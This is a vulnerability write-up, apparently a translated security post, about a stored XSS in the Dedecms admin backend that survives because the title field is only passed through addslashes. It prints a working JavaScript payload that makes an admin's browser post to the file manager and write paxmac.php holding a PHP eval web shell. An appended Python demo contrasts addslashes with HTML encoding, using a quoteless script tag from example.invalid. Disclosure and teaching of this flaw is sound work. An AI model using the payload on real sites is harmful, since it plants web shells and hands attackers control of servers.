Dedecms has many vulnerabilities, but the vendor does not fix them.
In the earlier double-injection vulnerability the title field could also be used for XSS, but the vendor only fixed the injection. The XSS was not fixed; instead, addslashes was applied to the title, which only escapes quotes and backslashes and does nothing to HTML tags.
The XSS is triggered in the admin backend.
The JavaScript used:
```javascript
var request = false;
if (window.XMLHttpRequest) {
    request = new XMLHttpRequest();
    if (request.overrideMimeType) {
        request.overrideMimeType('text/xml');
    }
} else if (window.ActiveXObject) {
    var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP',
                    'MSXML2.XMLHTTP.7.0', 'MSXML2.XMLHTTP.6.0', 'MSXML2.XMLHTTP.5.0',
                    'MSXML2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
    for (var i = 0; i < versions.length; i++) {
        try {
            request = new ActiveXObject(versions[i]);
        } catch (e) {}
    }
}
xmlhttp = request;
getshell();

function getshell() {
    // modify by yourself
    var postStr = "fmdo=edit&backurl=&activepath=%2Fdedecmsfullnew%2Fuploads%2Fuploads&filename=paxmac.php&str=%3C%3Fphp+eval%28%24_POST%5B%27cmd%27%5D%29%3B%3F%3E&B1=++%B1%A3+%B4%E6++";
    // modify the url by yourself
    xmlhttp.open("POST", "http://paxmac/dedecmsfullnew/uploads/dede/file_manage_control.php", true);
    xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    xmlhttp.setRequestHeader("Content-length", postStr.length);
    xmlhttp.setRequestHeader("Connection", "close");
    xmlhttp.send(postStr);
}
```
Before triggering
After triggering
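Why addslashes on the title does not stop this XSS, as an added example that is not part of the original post or of Dedecms: a Python emulation of PHP's addslashes() beside real HTML output encoding, run over a constructed title value that uses no quotes at all. The title string and the `example.invalid` host are constructed for the demonstration.

```python
import html
import re

# Added example, not Dedecms code: emulate PHP addslashes() and compare it
# with HTML entity encoding, the control that actually prevents stored XSS.

def addslashes(s: str) -> str:
    """Emulate PHP addslashes(): backslash-escape only ' " \\ and NUL.
    It is an SQL-quoting helper and knows nothing about HTML."""
    out = []
    for ch in s:
        if ch in ("'", '"', "\\"):
            out.append("\\" + ch)
        elif ch == "\x00":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)

def html_encode(s: str) -> str:
    """The actual XSS fix: entity-encode < > & and quotes at output time."""
    return html.escape(s, quote=True)

_SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)

def renders_as_script(fragment: str) -> bool:
    """True if the fragment still contains a raw <script> start tag."""
    return _SCRIPT_TAG.search(fragment) is not None

# Constructed sample: a title with no quotes, so addslashes has nothing to
# escape; an unquoted src attribute is valid HTML.
QUOTELESS_TITLE = "<script src=//example.invalid/x.js></script>"

def compare_filters(title: str) -> dict:
    """Return what each filter leaves behind and whether a script tag survives."""
    slashed = addslashes(title)
    encoded = html_encode(title)
    return {
        "addslashes": slashed,
        "addslashes_still_script": renders_as_script(slashed),
        "html_encode": encoded,
        "html_encode_still_script": renders_as_script(encoded),
    }

if __name__ == "__main__":
    for key, value in compare_filters(QUOTELESS_TITLE).items():
        print(f"{key}: {value}")
```

The addslashes output is byte-for-byte identical to the input, so the stored title still renders as a script tag on the admin page; the encoded output contains no `<` and renders as text.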